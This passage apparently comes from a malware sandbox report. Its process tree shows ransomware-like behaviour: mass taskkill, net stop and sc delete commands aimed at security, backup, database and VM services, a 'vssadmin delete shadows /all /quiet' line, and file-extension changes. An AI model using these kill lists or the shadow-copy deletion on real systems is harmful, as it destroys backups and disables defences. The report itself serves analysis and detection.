    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ftnlses.exe /F
        5⤵
        
        PID:2940
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ftusbrdwks.exe /F
        5⤵
        
        PID:2844
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ftusbrdsrv.exe /F
        5⤵
        
        PID:2812
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ftnlsv.exe /F
        5⤵
        
        PID:1888
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Syslogd_Service.exe /F
        5⤵
        
        PID:2864
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM UWS.HighPrivilegeUtilities.exe /F
        5⤵
        
        PID:2704
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ftusbsrv.exe /F
        5⤵
        
        PID:1808
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM UWS.LowPrivilegeUtilities.exe /F
        5⤵
        
        PID:572
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F
        5⤵
        
        PID:2240
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM winguard_x64.exe /F
        5⤵
        
        PID:2584
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM vmconnect.exe /F
        5⤵
        
        PID:1132
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM UWS.AppHost.Clr2.x86.exe /F
        5⤵
        
        PID:1476
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM firefox.exe /F
        5⤵
        
        PID:2640
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM usbrdsrv.exe /F
        5⤵
        
        PID:956
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM usbserver.exe /F
        5⤵
        
        PID:3004
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Foxmail.exe /F
        5⤵
        
        PID:3028
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM qemu-ga.exe /F
        5⤵
        
        PID:1808
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM wwbizsrv.exe /F
        5⤵
        
        PID:1728
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ZTEFileTranS.exe /F
        5⤵
        
        PID:2236
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ZTEUsbIpc.exe /F
        5⤵
        
        PID:1592
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ZTEUsbIpcGuard.exe /F
        5⤵
        
        PID:1036
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM AlibabaProtect.exe /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2404
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM kbasesrv.exe /F
        5⤵
        
        PID:956
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ZTEVdservice.exe /F
        5⤵
        
        PID:3004
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM MMRHookService.exe /F
        5⤵
        
        PID:2380
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM extjob.exe /F
        5⤵
        
        PID:2660
  - - C:\Windows\system32\cmd.exe
      cmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""
      4⤵
      PID:1964
    - - C:\Windows\system32\net.exe
        
        net stop VMUSBArbService
        5⤵
        
        PID:2752
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop VMUSBArbService
        6⤵
        
        PID:2780
    - - C:\Windows\system32\net.exe
        
        net stop VMAuthdService
        5⤵
        
        PID:2848
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop VMAuthdService
        6⤵
        
        PID:2916
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"
        7⤵
        
        PID:2864
    - - C:\Windows\system32\net.exe
        
        net stop VMnetDHCP
        5⤵
        
        PID:2720
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop VMnetDHCP
        6⤵
        
        PID:2556
    - - C:\Windows\system32\net.exe
        
        net stop "VMware NAT Service"
        5⤵
        
        PID:2800
    - - C:\Windows\system32\net.exe
        
        net stop CASWebServer
        5⤵
        
        PID:2776
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop CASWebServer
        6⤵
        
        PID:2780
    - - C:\Windows\system32\net.exe
        
        net stop "Alibaba Security Aegis Update Service"
        5⤵
        
        PID:2060
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"
        6⤵
        
        PID:2192
    - - C:\Windows\system32\net.exe
        
        net stop "Alibaba Security Aegis Detect Service"
        5⤵
        
        PID:2916
    - - C:\Windows\system32\net.exe
        
        net stop "AliyunService"
        5⤵
        
        PID:2176
    - - C:\Windows\system32\net.exe
        
        net stop AutoUpdateService
        5⤵
        
        PID:2704
    - - C:\Windows\system32\net.exe
        
        net stop CASLicenceServer
        5⤵
        
        PID:2516
    - - C:\Windows\system32\net.exe
        
        net stop QPCore
        5⤵
        
        PID:2024
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdTaskService1220
        6⤵
        
        PID:2548
    - - C:\Windows\system32\net.exe
        
        net stop TeamViewer
        5⤵
        Discovers systems in the same network
        
        PID:3028
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop XenSvc
        6⤵
        
        PID:2176
    - - C:\Windows\system32\net.exe
        
        net stop Tomcat8
        5⤵
        
        PID:2120
    - - C:\Windows\system32\net.exe
        
        net stop CASXMLService
        5⤵
        
        PID:2836
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop CASXMLService
        6⤵
        
        PID:3068
    - - C:\Windows\system32\net.exe
        
        net stop mysqltransport
        5⤵
        
        PID:2284
    - - C:\Windows\system32\net.exe
        
        net stop WebAttendServer
        5⤵
        
        PID:2108
    - - C:\Windows\system32\net.exe
        
        net stop AGSService
        5⤵
        
        PID:2764
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop AGSService
        6⤵
        
        PID:1468
    - - C:\Windows\system32\net.exe
        
        net stop RapService
        5⤵
        
        PID:3060
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop RapService
        6⤵
        
        PID:2788
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "NetBackup Client Service"
        7⤵
        
        PID:2832
    - - C:\Windows\system32\net.exe
        
        net stop wanxiao-monitor
        5⤵
        
        PID:3044
    - - C:\Windows\system32\net.exe
        
        net stop DDNSService
        5⤵
        
        PID:2400
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop DDNSService
        6⤵
        
        PID:2520
    - - C:\Windows\system32\net.exe
        
        net stop TeamViewer8
        5⤵
        Discovers systems in the same network
        
        PID:2672
    - - C:\Windows\system32\net.exe
        
        net stop iNethinkSQLBackupSvc
        5⤵
        
        PID:2480
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop iNethinkSQLBackupSvc
        6⤵
        
        PID:2656
    - - C:\Windows\system32\net.exe
        
        net stop CASMsgSrv
        5⤵
        
        PID:2188
    - - C:\Windows\system32\net.exe
        
        net stop DDVRulesProcessor
        5⤵
        
        PID:2296
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop DDVRulesProcessor
        6⤵
        
        PID:2136
    - - C:\Windows\system32\net.exe
        
        net stop "Dell Hardware Support"
        5⤵
        
        PID:2456
    - - C:\Windows\system32\net.exe
        
        net stop SupportAssistAgent
        5⤵
        
        PID:2680
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SupportAssistAgent
        6⤵
        
        PID:936
    - - C:\Windows\system32\net.exe
        
        net stop OMAILREPORT
        5⤵
        
        PID:2236
    - - C:\Windows\system32\net.exe
        
        net stop AutoUpdatePatchService
        5⤵
        
        PID:2228
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop ClickToRunSvc
        6⤵
        
        PID:2392
    - - C:\Windows\system32\net.exe
        
        net stop K3MMainSuspendService
        5⤵
        
        PID:2788
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop K3MMainSuspendService
        6⤵
        
        PID:2256
    - - C:\Windows\system32\net.exe
        
        net stop ImtsEventSvr
        5⤵
        
        PID:2708
    - - C:\Windows\system32\net.exe
        
        net stop KpService
        5⤵
        
        PID:2640
    - - C:\Windows\system32\net.exe
        
        net stop "FileZilla Server"
        5⤵
        
        PID:2540
    - - C:\Windows\system32\net.exe
        
        net stop ceng_web_svc_d
        5⤵
        
        PID:1936
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop ceng_web_svc_d
        6⤵
        
        PID:3048
    - - C:\Windows\system32\net.exe
        
        net stop K3MobileServiceManage
        5⤵
        
        PID:2168
    - - C:\Windows\system32\net.exe
        
        net stop TPlusStdUpgradeService1220
        5⤵
        
        PID:1228
    - - C:\Windows\system32\net.exe
        
        net stop KugouService
        5⤵
        
        PID:2532
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop KugouService
        6⤵
        
        PID:1200
    - - C:\Windows\system32\net.exe
        
        net stop TPlusStdTaskService1220
        5⤵
        
        PID:2024
    - - C:\Windows\system32\net.exe
        
        net stop pcas
        5⤵
        
        PID:2224
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop pcas
        6⤵
        
        PID:2844
    - - C:\Windows\system32\net.exe
        
        net stop TPlusStdAppService1220
        5⤵
        
        PID:2588
    - - C:\Windows\system32\net.exe
        
        net stop U8SendMailAdmin
        5⤵
        
        PID:2928
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop U8SendMailAdmin
        6⤵
        
        PID:2892
    - - C:\Windows\system32\net.exe
        
        net stop "Bonjour Service"
        5⤵
        
        PID:2724
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Bonjour Service"
        6⤵
        
        PID:3000
    - - C:\Windows\system32\net.exe
        
        net stop "Apple Mobile Device Service"
        5⤵
        
        PID:2260
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Apple Mobile Device Service"
        6⤵
        
        PID:2696
    - - C:\Windows\system32\net.exe
        
        net stop "ABBYY.Licensing.FineReader.Professional.12.0"
        5⤵
        
        PID:3032
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ABBYY.Licensing.FineReader.Professional.12.0"
        6⤵
        
        PID:2480
    - - C:\Windows\system32\net.exe
        
        net stop MySQL
        5⤵
        
        PID:2936
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop UFAllNet
        6⤵
        
        PID:2336
    - - C:\Windows\system32\net.exe
        
        net stop OracleDBConsoleilas
        5⤵
        
        PID:2352
    - - C:\Windows\system32\net.exe
        
        net stop "OracleOraDb10g_homeliSQL*Plus"
        5⤵
        
        PID:2684
    - - C:\Windows\system32\net.exe
        
        net stop CASVirtualDiskService
        5⤵
        
        PID:1380
  - - C:\Windows\system32\cmd.exe
      cmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"
      4⤵
      PID:1592
    - - C:\Windows\system32\net.exe
        
        net stop DellDRLogSvc
        5⤵
        
        PID:2832
    - - C:\Windows\system32\net.exe
        
        net stop FirebirdGuardianDeafaultInstance
        5⤵
        
        PID:1212
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance
        6⤵
        
        PID:2320
    - - C:\Windows\system32\net.exe
        
        net stop Service2
        5⤵
        
        PID:1560
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop Service2
        6⤵
        
        PID:2432
    - - C:\Windows\system32\net.exe
        
        net stop RapidRecoveryAgent
        5⤵
        
        PID:2532
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop RapidRecoveryAgent
        6⤵
        
        PID:2244
    - - C:\Windows\system32\net.exe
        
        net stop FirebirdServerDefaultInstance
        5⤵
        
        PID:1056
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop FirebirdServerDefaultInstance
        6⤵
        
        PID:2876
    - - C:\Windows\system32\net.exe
        
        net stop JWService
        5⤵
        
        PID:2756
    - - C:\Windows\system32\net.exe
        
        net stop JWRinfoClientService
        5⤵
        
        PID:2420
    - - C:\Windows\system32\net.exe
        
        net stop JWEM3DBAUTORun
        5⤵
        
        PID:2056
    - - C:\Windows\system32\net.exe
        
        net stop "Synology Drive VSS Service x64"
        5⤵
        
        PID:2648
    - - C:\Windows\system32\net.exe
        
        net stop Apache2.2
        5⤵
        
        PID:564
    - - C:\Windows\system32\net.exe
        
        net stop AdobeARMservice
        5⤵
        
        PID:864
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop AdobeARMservice
        6⤵
        
        PID:1232
    - - C:\Windows\system32\net.exe
        
        net stop VeeamCatalogSvc
        5⤵
        
        PID:1832
    - - C:\Windows\system32\net.exe
        
        net stop XenSvc
        5⤵
        
        PID:3028
    - - C:\Windows\system32\net.exe
        
        net stop xenlite
        5⤵
        
        PID:2860
    - - C:\Windows\system32\net.exe
        
        net stop VeeanBackupSvc
        5⤵
        
        PID:3032
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop VeeanBackupSvc
        6⤵
        
        PID:2996
    - - C:\Windows\system32\net.exe
        
        net stop VeeamTransportSvc
        5⤵
        
        PID:2496
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop VeeamTransportSvc
        6⤵
        
        PID:2728
    - - C:\Windows\system32\net.exe
        
        net stop Realtek11nSU
        5⤵
        
        PID:2588
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdAppService1220
        6⤵
        
        PID:2728
    - - C:\Windows\system32\net.exe
        
        net stop TPlusStdAppService1300
        5⤵
        
        PID:2560
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdAppService1300
        6⤵
        
        PID:2796
    - - C:\Windows\system32\net.exe
        
        net stop TPlusStdUpgradeService1300
        5⤵
        
        PID:2672
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdUpgradeService1300
        6⤵
        
        PID:1828
    - - C:\Windows\system32\net.exe
        
        net stop TPlusStdWebService1300
        5⤵
        
        PID:2056
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdWebService1300
        6⤵
        
        PID:2424
    - - C:\Windows\system32\net.exe
        
        net stop VeeamNFSSvc
        5⤵
        
        PID:2276
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop VeeamNFSSvc
        6⤵
        
        PID:2400
    - - C:\Windows\system32\net.exe
        
        net stop VeeamDeploySvc
        5⤵
        
        PID:2572
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop VeeamDeploySvc
        6⤵
        
        PID:2468
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop UFReportService
        7⤵
        
        PID:1788
    - - C:\Windows\system32\net.exe
        
        net stop VeeamCloudSvc
        5⤵
        
        PID:1588
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop VeeamCloudSvc
        6⤵
        
        PID:1468
    - - C:\Windows\system32\net.exe
        
        net stop tmlisten
        5⤵
        
        PID:944
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop tmlisten
        6⤵
        
        PID:2240
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeNotificationsBroker
        7⤵
        
        PID:2460
    - - C:\Windows\system32\net.exe
        
        net stop ServiceMid
        5⤵
        
        PID:2796
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop ServiceMid
        6⤵
        
        PID:2968
    - - C:\Windows\system32\net.exe
        
        net stop 360EntPGSvc
        5⤵
        
        PID:324
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop 360EntPGSvc
        6⤵
        
        PID:2052
    - - C:\Windows\system32\net.exe
        
        net stop VeeamDistributionSvc
        5⤵
        
        PID:2140
    - - C:\Windows\system32\net.exe
        
        net stop ClickToRunSvc
        5⤵
        
        PID:2228
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop NFVPrintServer
        6⤵
        
        PID:2996
    - - C:\Windows\system32\net.exe
        
        net stop VeeamBrokerSvc
        5⤵
        
        PID:2812
    - - C:\Windows\system32\net.exe
        
        net stop VeeamMountSvc
        5⤵
        
        PID:1516
    - - C:\Windows\system32\net.exe
        
        net stop RavTask
        5⤵
        
        PID:3004
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop RavTask
        6⤵
        
        PID:2660
    - - C:\Windows\system32\net.exe
        
        net stop AngelOfDeath
        5⤵
        
        PID:3060
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop AngelOfDeath
        6⤵
        
        PID:1560
    - - C:\Windows\system32\net.exe
        
        net stop d_safe
        5⤵
        
        PID:2084
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop d_safe
        6⤵
        
        PID:2544
    - - C:\Windows\system32\net.exe
        
        net stop NFLicenceServer
        5⤵
        
        PID:3044
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop NFLicenceServer
        6⤵
        
        PID:1788
    - - C:\Windows\system32\net.exe
        
        net stop "NetVault Process Manager"
        5⤵
        
        PID:2704
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "NetVault Process Manager"
        6⤵
        
        PID:2128
    - - C:\Windows\system32\net.exe
        
        net stop RavService
        5⤵
        
        PID:884
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop RavService
        6⤵
        
        PID:2720
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeImap4
        7⤵
        
        PID:1588
    - - C:\Windows\system32\net.exe
        
        net stop DFServ
        5⤵
        
        PID:936
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop DFServ
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2536
    - - C:\Windows\system32\net.exe
        
        net stop IngressMgr
        5⤵
        
        PID:2484
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop IngressMgr
        6⤵
        
        PID:2564
    - - C:\Windows\system32\net.exe
        
        net stop EvtSys
        5⤵
        
        PID:2420
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop EvtSys
        6⤵
        
        PID:1972
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeMailboxReplication
        6⤵
        
        PID:2192
    - - C:\Windows\system32\net.exe
        
        net stop K3ClouManager
        5⤵
        
        PID:2436
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop K3ClouManager
        6⤵
        
        PID:3048
    - - C:\Windows\system32\net.exe
        
        net stop TPlusStdTaskService1300
        5⤵
        
        PID:2792
    - - C:\Windows\system32\net.exe
        
        net stop NFVPrintServer
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2228
    - - C:\Windows\system32\net.exe
        
        net stop RTCAVMCU
        5⤵
        
        PID:2284
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop RTCAVMCU
        6⤵
        
        PID:2060
    - - C:\Windows\system32\net.exe
        
        net stop CobianBackup10
        5⤵
        
        PID:3008
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop CobianBackup10
        6⤵
        
        PID:2908
    - - C:\Windows\system32\net.exe
        
        net stop GNWebService
        5⤵
        
        PID:2452
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop GNWebService
        6⤵
        
        PID:1688
    - - C:\Windows\system32\net.exe
        
        net stop Mysoft.SchedulingService
        5⤵
        
        PID:3004
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop Mysoft.SchedulingService
        6⤵
        
        PID:2224
    - - C:\Windows\system32\net.exe
        
        net stop AgentX
        5⤵
        
        PID:2648
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop AgentX
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:340
    - - C:\Windows\system32\net.exe
        
        net stop SentinelKeysServer
        5⤵
        
        PID:2220
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SentinelKeysServer
        6⤵
        
        PID:2892
    - - C:\Windows\system32\net.exe
        
        net stop DGPNPSEV
        5⤵
        
        PID:2336
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop DGPNPSEV
        6⤵
        
        PID:2516
    - - C:\Windows\system32\net.exe
        
        net stop TurboCRM70
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2084
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop TurboCRM70
        6⤵
        
        PID:2304
    - - C:\Windows\system32\net.exe
        
        net stop NFSysService
        5⤵
        
        PID:2808
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop NFSysService
        6⤵
        
        PID:3032
    - - C:\Windows\system32\net.exe
        
        net stop U8DispatchService
        5⤵
        
        PID:1380
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop U8DispatchService
        6⤵
        
        PID:2136
    - - C:\Windows\system32\net.exe
        
        net stop NFOTPService
        5⤵
        
        PID:536
    - - C:\Windows\system32\net.exe
        
        net stop U8EISService
        5⤵
        
        PID:2192
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop U8EISService
        6⤵
        
        PID:2788
    - - C:\Windows\system32\net.exe
        
        net stop U8EncryptService
        5⤵
        
        PID:2988
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop U8EncryptService
        6⤵
        
        PID:1264
    - - C:\Windows\system32\net.exe
        
        net stop U8GCService
        5⤵
        
        PID:2116
    - - C:\Windows\system32\net.exe
        
        net stop U8KeyManagePool
        5⤵
        
        PID:3004
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop U8KeyManagePool
        6⤵
        
        PID:2628
    - - C:\Windows\system32\net.exe
        
        net stop U8MPool
        5⤵
        
        PID:2220
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop U8MPool
        6⤵
        
        PID:1560
    - - C:\Windows\system32\net.exe
        
        net stop U8SCMPool
        5⤵
        
        PID:2940
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop U8SCMPool
        6⤵
        
        PID:2100
    - - C:\Windows\system32\net.exe
        
        net stop U8SLReportService
        5⤵
        
        PID:2320
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop U8SLReportService
        6⤵
        
        PID:1724
    - - C:\Windows\system32\net.exe
        
        net stop UFReportService
        5⤵
        
        PID:2468
    - - C:\Windows\system32\net.exe
        
        net stop UTUService
        5⤵
        
        PID:1584
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop UTUService
        6⤵
        
        PID:884
    - - C:\Windows\system32\net.exe
        
        net stop UFAllNet
        5⤵
        
        PID:2936
    - - C:\Windows\system32\net.exe
        
        net stop U8WebPool
        5⤵
        
        PID:2912
    - - C:\Windows\system32\net.exe
        
        net stop U8TaskService
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1832
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  - Modifies extensions of user files
  - Adds Run key to start application
  - Drops desktop.ini file(s)
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Suspicious behavior: RenamesItself
  - Suspicious use of AdjustPrivilegeToken
  PID:1804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c @echo off sc config browser sc config browser start=enabled vssadmin delete shadows /all /quiet sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled
    3⤵
    PID:2404

C:\Windows\system32\sc.exe
sc delete "UWS LoPriv Services"
1⤵
PID:1188

C:\Windows\system32\sc.exe
sc delete ftnlsv3
1⤵
PID:2056
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop JWEM3DBAUTORun
  2⤵
  PID:2484

C:\Windows\system32\net.exe
net stop HaoZipSvc
1⤵
PID:2128
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop HaoZipSvc
  2⤵
  PID:2172

C:\Windows\system32\net.exe
net stop UIODetect
1⤵
PID:2192
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop UIODetect
  2⤵
  PID:2212

C:\Windows\system32\net.exe
net stop "igfxCUIService2.0.0.0"
1⤵
PID:2236
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"
  2⤵
  PID:2384
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop OMAILREPORT
  2⤵
  PID:2668

C:\Windows\system32\taskkill.exe
taskkill /IM pg_ctl.exe /F
1⤵
PID:2536

C:\Windows\system32\sc.exe
sc delete FxService
1⤵
PID:2548

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VMwareHostd
1⤵
PID:2512

C:\Windows\system32\net.exe
net stop VMwareHostd
1⤵
PID:2456
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "Dell Hardware Support"
  2⤵
  PID:2084

C:\Windows\system32\sc.exe
sc delete ftnlses3
1⤵
PID:2372

C:\Windows\system32\sc.exe
sc delete ftusbrdwks
1⤵
PID:2816

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop xenlite
1⤵
PID:2884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wanxiao-monitor
1⤵
PID:1724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mysqltransport
1⤵
PID:2420
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop JWRinfoClientService
  2⤵
  PID:2460

C:\Windows\system32\sc.exe
sc delete qemu-ga
1⤵
